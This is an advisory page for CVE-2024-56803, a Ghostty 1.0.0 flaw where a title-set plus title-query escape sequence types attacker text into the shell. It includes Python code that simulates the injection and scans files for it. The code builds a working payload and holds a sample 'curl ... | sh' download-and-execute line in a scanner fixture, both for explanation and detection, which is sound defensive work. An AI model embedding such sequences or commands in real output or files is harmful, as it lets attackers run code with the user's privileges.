CVE-2024-56803

Source: security-advisories@github.com

MEDIUM
5.1
Published: December 31, 2024 at 11:15 PM
Modified: December 31, 2024 at 11:15 PM

Vulnerability Description

Ghostty is a cross-platform terminal emulator. Ghostty, as allowed by default in 1.0.0, allows attackers to modify the window title via a certain character escape sequence and then insert it back to the command line in the user's terminal, e.g. when the user views a file containing the malicious sequence, which could allow the attacker to execute arbitrary commands. This attack requires an attacker to send malicious escape sequences followed by convincing the user to physically press the "enter" key. Fixed in Ghostty v1.0.1.

CVSS Metrics

Base Score
5.1
Severity
MEDIUM
Vector String
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Weaknesses (CWE)

Source: security-advisories@github.com

AI Security Analysis

01 // Technical Summary

Ghostty 1.0.0 can be turned into a command-injection vector by bytes written to the terminal. Any program that writes attacker-controlled data to the terminal (for example `cat` on a crafted file) can set the window title with an escape sequence and then ask the terminal to report that title; 1.0.0 answers by writing the title back into the shell's input as if the user had typed it. If the title contains a command and the user presses Enter, the command runs with the user's privileges. The attack needs no bug in the shell and no shell metacharacters, only the user's keystroke, which is why the CVSS vector carries UI:A.

02 // Vulnerability Mechanism

Step 1: Payload Creation: The attacker builds a file (or any data stream) carrying two escape sequences: one that sets the window title to the text of a shell command, and one that asks the terminal to report its title. No shell metacharacters are needed; the title text itself becomes the command line.

Step 2: Payload Delivery: The attacker gets the raw bytes onto the user's terminal: a file the user runs `cat` or `tail -f` on, log or CI output that scrolls past, server output from `curl`, or a pasted snippet. Tools that render control characters visibly (`less` without `-r`, most editors) do not pass the sequences through, so the attacker targets paths that write bytes unfiltered. Social engineering, phishing, or a shared repository or file share are the usual delivery routes.

Step 3: Window Title Modification: Ghostty processes the title-set sequence and changes the window title to the attacker-controlled string. The user may notice the title bar change, but nothing else on screen indicates that anything happened.

Step 4: Command Injection: The title-report request in the same stream makes Ghostty 1.0.0 write the current title back to the pty, that is, into the shell's standard input, framed as a title-report reply. The shell's line editor receives those bytes exactly as if they had been typed, so the command text lands on (or is queued for) the command line. The attacker then relies on the user pressing Enter, for example because the injected text is followed by innocuous-looking output or because the user simply hits Enter to get a fresh prompt.

Step 5: Code Execution: The shell runs the injected text with the user's privileges: whatever the user can do, the command can do, including installing persistence or exfiltrating data.

03 // Deep Technical Analysis

The root cause is not a missing filter on the title text but a feature: Ghostty 1.0.0 implemented the xterm window-operations sequence that reports the window title, and it was enabled by default. A terminal's output stream is under the control of whatever writes to it, so one stream can both set the title and request it back, and the reply is delivered on the only channel a terminal has back to the application: the pty input, which the shell reads as keystrokes. That turns a write-only display channel into a write-to-stdin primitive. Escaping or stripping shell metacharacters from the title would not help, because a plain command such as `curl ... | sh` contains nothing a metacharacter filter needs to remove, and because the terminal cannot know which program will consume the reply. This is the same class of issue as the 2003 xterm title-reporting advisory (CVE-2003-0063), whose description the CVE text above reuses almost verbatim. The fix shipped in Ghostty 1.0.1 is for the terminal not to answer the title query by default. The attack completes only when the user presses Enter, which is why the CVSS vector requires active user interaction.
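As an added illustration of the round trip described in sections 02 and 03 (this is example code written for this page, not Ghostty's implementation): a toy terminal that understands only the two xterm sequences involved, the OSC title set and the CSI 21 t title query. The class and function names, the "echo pwned" payload and the `visible_in_line_buffer` approximation of what a line editor keeps are all assumptions made for the example; the reply format `ESC ] l <title> ESC \` is xterm's.

```python
"""
Toy model of the title-set / title-report round trip behind CVE-2024-56803.
Not Ghostty code: a minimal parser for two xterm sequences, used to show why
answering a title query with the title's bytes turns `cat malicious.txt`
into keyboard input for the shell.
"""
import re

ESC = "\x1b"
BEL = "\x07"
ST = ESC + "\\"          # String Terminator (ESC \)

# OSC 0 or OSC 2 ";" <text>, terminated by BEL or ST, sets the window title.
OSC_TITLE = re.compile(r"\x1b\]([02]);(.*?)(?:\x07|\x1b\\)", re.DOTALL)
# CSI 21 t (xterm XTWINOPS) asks the terminal to report its title.
CSI_TITLE_QUERY = re.compile(r"\x1b\[21t")


class ToyTerminal:
    """Consumes what the application wrote to the terminal (the pty output
    side) and records what the terminal writes back to the application
    (the pty input side, i.e. the shell's stdin)."""

    def __init__(self, answer_title_query: bool):
        self.answer_title_query = answer_title_query  # True models the 1.0.0 default
        self.title = "ghostty"
        self.pty_input = ""   # bytes sent back to the shell as if typed
        self.screen = ""      # ordinary text, shown to the user

    def feed(self, stream: str) -> None:
        pos = 0
        while pos < len(stream):
            m = OSC_TITLE.match(stream, pos)
            if m:
                self.title = m.group(2)
                pos = m.end()
                continue
            m = CSI_TITLE_QUERY.match(stream, pos)
            if m:
                if self.answer_title_query:
                    # xterm's reply format: OSC l <title> ST, delivered on stdin.
                    self.pty_input += ESC + "]l" + self.title + ST
                # Hardened behaviour: the query is simply not answered.
                pos = m.end()
                continue
            self.screen += stream[pos]
            pos += 1


def attacker_file(command: str) -> str:
    """Constructed payload: set the title to the command, ask for it back,
    then pad with text that looks like an ordinary line of output."""
    return ESC + "]2;" + command + BEL + ESC + "[21t" + "INFO: done\n"


def visible_in_line_buffer(pty_input: str) -> str:
    """Approximation (an assumption, not a spec): a line editor drops the
    non-printable reply framing and keeps the printable title text."""
    return re.sub(r"\x1b\]l|\x1b\\", "", pty_input)


def simulate(answer_title_query: bool, command: str = "echo pwned") -> dict:
    """Run the payload through a terminal with or without title reporting."""
    term = ToyTerminal(answer_title_query)
    term.feed(attacker_file(command))
    return {
        "title": term.title,
        "screen": term.screen,
        "pty_input": term.pty_input,
        "line_buffer": visible_in_line_buffer(term.pty_input),
    }


if __name__ == "__main__":
    for enabled in (True, False):
        r = simulate(enabled)
        print(f"title reporting {'on' if enabled else 'off'}: "
              f"shell receives {r['pty_input']!r}, line buffer {r['line_buffer']!r}")
```

With reporting enabled the user sees only `INFO: done` on screen while `echo pwned` is already sitting in the shell's input; with reporting disabled the title still changes, but nothing reaches stdin and there is nothing for Enter to execute.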

04 // Exploitation Status

Public PoC. No exploit development is required: the payload is two short escape sequences that `printf` or any scripting language can emit. The user-interaction requirement keeps this out of fully automated exploitation, but it fits naturally into phishing (a "have a look at this log" attachment) and into poisoned output from servers, build systems or repositories that developers routinely `cat`.

05 // Threat Intelligence

No specific threat actor is publicly linked to this vulnerability at this time. The technique is attractive because it works through channels developers trust (logs, build output, files in a repository) and runs with the user's full privileges; a successful attack could establish persistence or exfiltrate data, while privilege escalation would need a separate flaw. Not currently listed on CISA KEV.

06 // Detection & Hunting

  • Terminal emulators do not normally log title changes, so the practical place to look is content: scan files, logs, pastes and CI output that users are likely to view in a terminal for an OSC title-set sequence (ESC ] 0 ; or ESC ] 2 ;) followed by a title query (ESC [ 21 t). A title query alone is almost never legitimate inside a file.

  • Look for outbound connections from processes whose parent is an interactive shell, shortly after a file-viewing command such as `cat` or `tail`.

  • Implement file integrity monitoring to detect changes to critical system files that could be caused by the execution of malicious commands.

  • Monitor for the creation of new user accounts or the modification of existing ones.

  • Examine process-creation telemetry for commands spawned by an interactive shell whose command line matches text that also appears in a recently viewed file (the injected title), or that a user is unlikely to have typed by hand (download-and-execute one-liners).
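The first bullet above is easier to act on as code. The scanner below is an added example for this page, not a Ghostty component or a detection the advisory ships: it flags every title query in a byte stream and pairs it with the most recent title-set sequence, which is the text that would be echoed back as keystrokes. The sample "files" are constructed, and matching the 8-bit C1 forms of OSC, CSI and ST is a conservative assumption about what to flag, not a statement about what Ghostty accepts.

```python
"""
Scan content for the two-sequence pattern behind CVE-2024-56803:
an OSC title set followed by an XTWINOPS title query (CSI 21 t).
Example code for this page; sample inputs are constructed.
"""
import re

# 7-bit and 8-bit (C1) introducers. The 8-bit forms are flagged on the
# assumption that some emulators accept them, not because Ghostty is known to.
OSC = rb"(?:\x1b\]|\x9d)"
CSI = rb"(?:\x1b\[|\x9b)"
TERM = rb"(?:\x07|\x1b\\|\x9c)"      # BEL, ESC \, or 8-bit ST

TITLE_SET = re.compile(OSC + rb"([012]);(.*?)" + TERM, re.DOTALL)
TITLE_QUERY = re.compile(CSI + rb"21t")


def find_title_report_payloads(data: bytes) -> list:
    """One finding per title query. The title is the text of the last
    title-set sequence before the query; None if the query stands alone
    (still worth flagging: it would echo back whatever title is current)."""
    findings = []
    for q in TITLE_QUERY.finditer(data):
        sets = list(TITLE_SET.finditer(data, 0, q.start()))
        last = sets[-1] if sets else None
        findings.append({
            "query_offset": q.start(),
            "title": last.group(2) if last else None,
            "title_offset": last.start() if last else None,
        })
    return findings


def scan_files(files: dict) -> dict:
    """files maps name -> bytes; returns name -> findings for files with a query."""
    hits = {}
    for name, data in files.items():
        findings = find_title_report_payloads(data)
        if findings:
            hits[name] = findings
    return hits


# Constructed samples (not real logs). A shell prompt that sets the title is
# common and benign; only the query makes the pattern dangerous.
SAMPLES = {
    "benign_prompt.log": b"\x1b]0;alice@host: ~\x07$ make test\nall tests passed\n",
    "malicious.txt": (b"INFO starting\n"
                      b"\x1b]2;curl http://198.51.100.7/x | sh\x07\x1b[21t"
                      b"INFO done\n"),
    "c1_variant.txt": b"\x9d2;echo pwned\x9c\x9b21t\n",
}


if __name__ == "__main__":
    for name, findings in scan_files(SAMPLES).items():
        for f in findings:
            print(f"{name}: title query at byte {f['query_offset']}, "
                  f"would echo {f['title']!r}")
```

Run it over a directory of attachments, repository files or captured build output; a hit on `benign_prompt.log`-style content is expected to be rare because the query, not the title set, is the signal.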

07 // Remediation & Hardening

  • Upgrade to Ghostty v1.0.1 or later, where the title query is no longer answered by default.

  • For terminal emulator maintainers: do not answer title queries at all, or answer with a fixed string the application cannot control. Filtering shell metacharacters from the title is not a fix, because the injected text need not contain any.

  • Keep title reporting disabled after upgrading and treat any option that re-enables it as a security setting, not a convenience. Do not view untrusted output with pager options that pass raw control sequences through.

  • Train users to view untrusted files with tools that neutralize control characters (`cat -v`, `less` without `-r`), and to clear the line (Ctrl-U or Ctrl-C) rather than press Enter when unexpected text appears on the command line or the window title changes without reason.

  • Fold the delivery scenarios (attachments that "need looking at", poisoned logs and build output) into existing phishing and social-engineering awareness material.

08 // Affected Products

Ghostty 1.0.0